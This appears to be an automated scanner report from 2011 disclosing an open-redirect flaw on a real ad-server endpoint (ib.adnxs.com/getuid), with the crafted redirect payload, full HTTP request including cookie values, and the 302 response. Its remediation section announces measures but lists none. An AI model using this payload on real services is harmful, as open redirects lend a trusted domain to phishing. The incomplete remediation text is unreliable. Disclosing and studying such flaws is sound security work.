Open Redirection, Arbitrary Supplied Request Parameter

CloudScan Vulnerability Crawler | Open Redirection Example PoC

Report generated by Hoyt LLC Research at Sat Feb 12 19:43:09 CST 2011.


The DORK Report

1. Open redirection

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /getuid

Issue detail

The name of an arbitrarily supplied request parameter is used to perform an HTTP redirect. The payload http%3a//a21176f6ce064ea74/a%3f1 was submitted in the name of an arbitrarily supplied request parameter. This caused a redirection to the following URL: http://a21176f6ce064ea74/a?1=1

Issue background

Open redirection vulnerabilities arise when an application incorporates user-controllable data into the target of a redirection in an unsafe way. An attacker can construct a URL within the application which causes a redirection to an arbitrary external domain. This behaviour can be leveraged to facilitate phishing attacks against users of the application. The ability to use an authentic application URL, targeting the correct domain with a valid SSL certificate (if SSL is used), lends credibility to the phishing attack because many users, even if they verify these features, will not notice the subsequent redirection to a different domain.

Issue remediation

If possible, applications should avoid incorporating user-controllable data into redirection targets. In many cases, this behaviour can be avoided in two ways:

If it is considered unavoidable for the redirection function to receive user-controllable input and incorporate this into the redirection target, one of the following measures should be used to minimize the risk of redirection attacks:

Request

GET /getuid?http%3a//a21176f6ce064ea74/a%3f1=1 HTTP/1.1
Host: ib.adnxs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anj=Kfw)mCZ(]G)J70w+=yTXYSoI81$GT2%P.Fs/Z'i@r'Nj7qqZFRm4V'%EUd@k)p'R2d$I:)R5]iv(Eb*4:P4h%C@1=-S^_hGu@a[kt]lA!LW2VYpJYWI758p-wS(7.aiq='MK:0T<o`GQudYGTfIIv7IJ4X*FV+2KwVqix-BQX*iV2m=N5e_ArSaX`x(TD9]I?Lx1^(Pkc/(U6p:UNE`H:]kF#or$a:#.8^1aMUKsQS*5T+w8/lvWH*`Pe7wPB`n..>*1(L>BhYi%AMazz!+KblkJ?VindLbDQznB4HNXYoIZF'w8(N852RcGROGo[HO5KGb?VR@Cqkv]SL8W*Jd<GCT@qFDyA^LKAB/sy*PO]pXk:5pP1z_Ol=Hi_5*m'N5mAsNWgtDR9FmP4<3>3i-!Smm?tk-zNC!rP]l_$INIVY*:2'=fT7R1mkau)j(/96%9eEV1+Ochgk]j`eA)bdG<uJ-(/a5reS%DHuJG6*DHoA/NqzViCZH8tEd3Bx6:V=I.uv85!bYjIue[anS(+AnO^u3k-W(gHZMYMv<@#aqIU4%Iv`.s_i*i8>@wdl8QtM3hQiO$k)z@VnVpF2dP4f`dKSe?`M%u(D:2NICjisGCb@$Ir!TTtDN9SZZf^zxXGEExLlr2D>.NCk^To#JvU$>Sx9nZG88(B1pTM#lXYp?yu#EOYC67+).PvMT; icu=ChEI9nYQChgDIAMoAzCQnNvqBAoRCLN-EAoYASABKAEw_qjb6gQQ_qjb6gQYAw..; uuid2=4760492999213801733; sess=1; acb793602=5_[r^kI/7Zs/wcp!@@-#b%xgX?enc=x9rf2R69xT_mRBbEm5DDPwAAAAAAAAhA5kQWxJuQwz_H2t_ZHr3FP26CZTFwB8AuBWHfHSmrEEJ-1FZNAAAAAPA7AwA3AQAAZAAAAAIAAAA4UAIAy10AAAEAAABVU0QAVVNEANgCWgCqFAAAVQQBAgUCAAUAAAAANCLPlAAAAAA.&tt_code=cm.mtv&udj=uf%28%27a%27%2C+27%2C+1297536126%29%3Buf%28%27r%27%2C+151608%2C+1297536126%29%3Bppv%2882%2C+%273368700699719598702%27%2C+1297536126%2C+1307904126%2C+17328%2C+24011%29%3Bppv%2884%2C+%273368700699719598702%27%2C+1297536126%2C+1307904126%2C+17328%2C+24011%29%3Bppv%2811%2C+%273368700699719598702%27%2C+1297536126%2C+1307904126%2C+17328%2C+24011%29%3Bppv%2882%2C+%273368700699719598702%27%2C+1297536126%2C+1307904126%2C+17328%2C+24011%29%3Bppv%2884%2C+%273368700699719598702%27%2C+1297536126%2C+1307904126%2C+17328%2C+24011%29%3Bppv%2887%2C+%273368700699719598702%27%2C+1297536126%2C+1297622526%2C+17328%2C+24011%29%3Bppv%28619%2C+%273368700699719598702%27%2C+1297536126%2C+1297622526%2C+17328%2C+24011%29%3Bppv%28620%2C+%273368700699719598702%27%2C+1297536126%2C+1297622526%2C+17328%2C+24011%29%3Bppv%28621%2C+%273368700699719598702%27%2C+1297536126%2C+1297622526%2C+17328%2C+24011%29%3B&cnd=!ERxaJAiwhwEQuKAJGAAgy7sBKAAxxtrf2R69xT9CEwgAEAAYACABKP7__________wFCDAhSEIXCGRgLIAMoAkIMCFQQo_kPGAcgAygCSANQAFiqKWAAaGQ.&custom_macro=ADV_FREQ%5E1%5EREM_USER%5E0%5ECP_ID%5E17328;

Response

HTTP/1.1 302 Moved
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Mon, 14-Feb-2011 01:36:42 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Sat, 14-May-2011 01:36:42 GMT; domain=.adnxs.com; HttpOnly
Location: http://a21176f6ce064ea74/a?1=1
Date: Sun, 13 Feb 2011 01:36:42 GMT
Content-Length: 0
Connection: close
